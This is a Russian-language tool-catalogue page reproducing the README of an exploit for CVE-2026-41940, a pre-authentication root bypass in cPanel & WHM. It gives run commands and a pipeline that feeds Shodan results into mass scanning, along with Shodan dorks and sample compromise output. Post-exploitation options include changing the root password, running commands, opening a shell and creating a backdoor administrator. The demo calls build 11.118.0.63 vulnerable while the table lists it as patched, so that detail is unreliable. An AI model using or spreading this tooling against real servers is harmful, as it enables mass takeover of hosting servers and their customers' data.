Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — cPanel & WHM — обход аутентификации через CRLF-инъекцию в файле сессии | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM — обход аутентификации через CRLF-инъекцию в файле сессии

Репозиторий
110 ч 20 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 CVE-2026-41940 – Обход аутентификации cPanel и WHM

cPanel

⚡ Неаутентифицированный root – CRLF-инъекция в session-файл ⚡
«Одна цепочка, чтобы править всеми».

Python License No deps CVSS


🧠 Суть эксплойта в двух словах

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  Этап 1  ──  Создание pre‑auth cookie сессии              │
│  Этап 2  ──  CRLF-инъекция через заголовок `Authorization`│
│  Этап 3  ──  Запуск гаджета `do_token_denied` (raw → cache)│
│  Этап 4  ──  Проверка root-доступа к WHM через JSON API   │
└─────────────────────────────────────────────────────────────┘

💥 Результат – Полный root-доступ к WHM без каких-либо учётных данных.


📜 Лицензия

Этот проект выпущен под лицензией MIT – можете свободно использовать, изменять и распространять, но не будьте злыми 😈.
Подробности см. в файле LICENSE.


🛠️ Установка – буквально одна строка

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

Ноль зависимостей – только стандартная библиотека Python 3.
Вам не нужны pip, virtualenv или прочая ерунда.


🚀 Быстрый старт – запускайте прямо сейчас

Одиночная цель

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

Массовое сканирование из файла

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

Пайп из «дикого» интернета (Shodan, subfinder и т.д.)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 Параметры командной строки (самое интересное)


💀 Арсенал пост-эксплуатации

После того как вы взломали систему, вы можете:

  • 🔍 Перечислить все учётные записи cPanel – --action list
  • 🔑 Сменить root-пароль – --action passwd --passwd "h4ck3d!"
  • 🖥️ Выполнять команды ОС – --action cmd --cmd "id;whoami"
  • 📡 Интерактивная оболочка – --action shell (полный терминал WHM)
  • 👤 Создать бэкдор-администратора – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 Читать файлы (через оболочку) – cat /etc/passwd
  • 📊 Собрать информацию о сервере – --action info

🧪 Демонстрация – что вы увидите

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  Конфигурация:
   Целей    : 1
   Потоков  : 10
   Таймаут  : 15s
   Действие : только сканирование

[10:23:15] [SCAN] Запуск цепочки эксплойта из 4 этапов... https://192.168.1.100:2087
[10:23:15] [INFO] Обнаружено каноническое имя хоста: server.example.com
[10:23:15] [STEP] Этап 1/4 — Создание preauth-сессии...
[10:23:16] [  OK] Этап1: preauth-сессия = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Этап 2/4 — CRLF-инъекция через заголовок Authorization...
[10:23:17] [  OK] Этап2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Этап 3/4 — Запуск гаджета do_token_denied (raw→cache)...
[10:23:18] [  OK] Этап3: HTTP 401 — гаджет do_token_denied запущен
[10:23:18] [STEP] Этап 4/4 — Проверка root-доступа к WHM...
[10:23:18] [INFO] Этап4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 ПОДТВЕРЖДЁН — root-доступ к WHM! (v11.118.0.63 — ПОДТВЕРЖДЕНО уязвим)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Сессия   : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Версия   : 11.118.0.63
[10:23:18] [PWND]   URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — Сканирование завершено
  Время: 3.2s  ·  Целей: 1

  1 УЯЗВИМАЯ ЦЕЛЬ (ЦЕЛИ)

  [*] Цель     : https://192.168.1.100:2087
  [*] Версия   : 11.118.0.63
  [*] Token    : /cpsess1234567890
  [*] URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Сессия   : 9a7f8e3d2c1b0a9f
  [*] Доказательство : {"version":"11.118.0.63",...}

🔎 Shodan-дорки (найдите свою добычу)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 Затронутые версии – статус исправлений

Все версии ниже этих сборок уязвимы.


🕵️‍♂️ Автор и благодарности

0xgh057r3c0n – исследователь безопасности, реверс-инженер и кофеман.
GitHub | Twitter


⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированный доступ к компьютерным системам незаконен. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.
Используйте ответственно и всегда сначала получайте разрешение.


🌟 Поддержка / Участие

  • Нашли ошибку? Откройте issue.
  • Хотите улучшить код? PR приветствуются.
  • Понравился инструмент? Поставьте ⭐ на GitHub!

🔥 Взламывайте планету, но оставайтесь в рамках закона. 🔥

Скачать инструмент
ФлагОписание
-u, --urlURL одиночной цели (например, https://host:2087)
-l, --listФайл с одним URL на строку
--hostnameПереопределить канонический заголовок Host (автоопределяемый)
-t, --threadsКоличество потоков (по умолчанию: 10)
--timeoutТаймаут в секундах (по умолчанию: 15)
--rate-limitПауза между целями (в секундах)
--actionПост-эксплуатация: list, passwd, cmd, exec, info, version, shell, adduser
--passwdНовый root-пароль (с --action passwd)
--cmdКоманда ОС (с --action cmd/exec)
--new-userНовое имя пользователя cPanel (с --action adduser)
--new-domainНовый домен cPanel (с --action adduser)
-o, --outputСохранить результаты в JSON
ВеткаИсправленная сборкаСтатус
11.11011.110.0.97🛡️ Исправлено
11.11811.118.0.63🛡️ Исправлено
11.12611.126.0.54🛡️ Исправлено
11.13211.132.0.29🛡️ Исправлено
11.13411.134.0.20🛡️ Исправлено
11.13611.136.0.5🛡️ Исправлено